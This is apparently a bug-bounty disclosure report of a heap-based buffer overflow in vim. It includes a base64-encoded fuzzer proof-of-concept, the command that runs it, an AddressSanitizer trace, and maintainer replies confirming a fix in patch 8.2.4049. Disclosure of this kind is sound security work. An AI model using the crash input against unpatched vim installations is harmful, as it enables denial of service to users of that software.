Heap-based Buffer Overflow in vim/vim

Valid

Reported on

Jan 7th 2022


Description

A Heap-based Buffer Overflow has been found in vim commit 2f0936c

Proof of Concept

base64 poc
ZGVmIEZpcnN0RnVuY3Rpb24oKQogIGRlZiBTZWNvbmRGdW5vbmUKJCAgCiAgIGVuZGRCQkJCCmVu
ZGRlZgojIEN/////bGUgYWxsZWZ8QkJCQgplbmRkZWYKIyBDb21waWxlIGFsbCBmdW5jdGlvbnMK
ZGVmY29tcGlsZQo=
~/fuzzing/vim/fuzz/bin/vim  -u NONE -X -Z -e -s -S ./poc -c :qa!

ASan stack trace:

~/fuzzing/vim/fuzz/bin/vim  -u NONE -X -Z -e -s -S ./poc -c :qa!
=================================================================
==836524==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60200000622f at pc 0x0000004306f9 bp 0x7ffc883006f0 sp 0x7ffc882ffeb0
READ of size 5 at 0x60200000622f thread T0
    #0 0x4306f8 in strlen (/home/aidai/fuzzing/vim/fuzz/bin/vim+0x4306f8)
    #1 0xc444a6  (/home/aidai/fuzzing/vim/fuzz/bin/vim+0xc444a6)
    #2 0xf7515a  (/home/aidai/fuzzing/vim/fuzz/bin/vim+0xf7515a)
    #3 0xe1ba91  (/home/aidai/fuzzing/vim/fuzz/bin/vim+0xe1ba91)
    #4 0xe14ca4  (/home/aidai/fuzzing/vim/fuzz/bin/vim+0xe14ca4)
    #5 0xe14009  (/home/aidai/fuzzing/vim/fuzz/bin/vim+0xe14009)
    #6 0xe12ddf  (/home/aidai/fuzzing/vim/fuzz/bin/vim+0xe12ddf)
    #7 0xe12043  (/home/aidai/fuzzing/vim/fuzz/bin/vim+0xe12043)
    #8 0xe0e863  (/home/aidai/fuzzing/vim/fuzz/bin/vim+0xe0e863)
    #9 0xe0ffaa  (/home/aidai/fuzzing/vim/fuzz/bin/vim+0xe0ffaa)
    #10 0xdaf709  (/home/aidai/fuzzing/vim/fuzz/bin/vim+0xdaf709)
    #11 0xdc68ed  (/home/aidai/fuzzing/vim/fuzz/bin/vim+0xdc68ed)
    #12 0xd92167  (/home/aidai/fuzzing/vim/fuzz/bin/vim+0xd92167)
    #13 0x6e68fe  (/home/aidai/fuzzing/vim/fuzz/bin/vim+0x6e68fe)
    #14 0x6d9b41  (/home/aidai/fuzzing/vim/fuzz/bin/vim+0x6d9b41)
    #15 0xb6680a  (/home/aidai/fuzzing/vim/fuzz/bin/vim+0xb6680a)
    #16 0xb6457f  (/home/aidai/fuzzing/vim/fuzz/bin/vim+0xb6457f)
    #17 0x6e68fe  (/home/aidai/fuzzing/vim/fuzz/bin/vim+0x6e68fe)
    #18 0x6d9b41  (/home/aidai/fuzzing/vim/fuzz/bin/vim+0x6d9b41)
    #19 0xf60f43  (/home/aidai/fuzzing/vim/fuzz/bin/vim+0xf60f43)
    #20 0xf5d76f  (/home/aidai/fuzzing/vim/fuzz/bin/vim+0xf5d76f)
    #21 0x7f0d3f15a0b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
    #22 0x41dacd  (/home/aidai/fuzzing/vim/fuzz/bin/vim+0x41dacd)

0x60200000622f is located 1 bytes to the left of 4-byte region [0x602000006230,0x602000006234)
allocated by thread T0 here:
    #0 0x49620d in malloc (/home/aidai/fuzzing/vim/fuzz/bin/vim+0x49620d)
    #1 0x4c5d15  (/home/aidai/fuzzing/vim/fuzz/bin/vim+0x4c5d15)

SUMMARY: AddressSanitizer: heap-buffer-overflow (/home/aidai/fuzzing/vim/fuzz/bin/vim+0x4306f8) in strlen
Shadow bytes around the buggy address:
  0x0c047fff8bf0: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa
  0x0c047fff8c00: fa fa fd fa fa fa 00 00 fa fa 00 00 fa fa 06 fa
  0x0c047fff8c10: fa fa 00 01 fa fa fd fd fa fa fd fd fa fa 04 fa
  0x0c047fff8c20: fa fa 00 04 fa fa fd fd fa fa 00 03 fa fa fd fd
  0x0c047fff8c30: fa fa 00 03 fa fa fd fd fa fa 00 03 fa fa 00 06
=>0x0c047fff8c40: fa fa 00 05 fa[fa]04 fa fa fa fa fa fa fa fa fa
  0x0c047fff8c50: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fff8c60: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fff8c70: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fff8c80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fff8c90: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
  Shadow gap:              cc
==836524==ABORTING
We are processing your report and will contact the vim team within 24 hours. 6 months ago
We have contacted a member of the vim team and are waiting to hear back 6 months ago
aidaip modified the report
6 months ago
Bram Moolenaar
6 months ago

I can reproduce the problem. There is a much simpler POC though: def Func() $ enddef

When reporting a problem, please, please minimize the POC to be able to pinpoint the cause of the problem and make it easy to create a regression test.

Bram Moolenaar validated this vulnerability 6 months ago
aidaip has been awarded the disclosure bounty
The fix bounty is now up for grabs
aidaip
6 months ago

Researcher


sorry, I will minimize the poc in the future.

Bram Moolenaar confirmed that a fix has been merged on 5f25c3 6 months ago
Bram Moolenaar has been awarded the fix bounty
Bram Moolenaar
6 months ago

Fixed in patch 8.2.4049

to join this conversation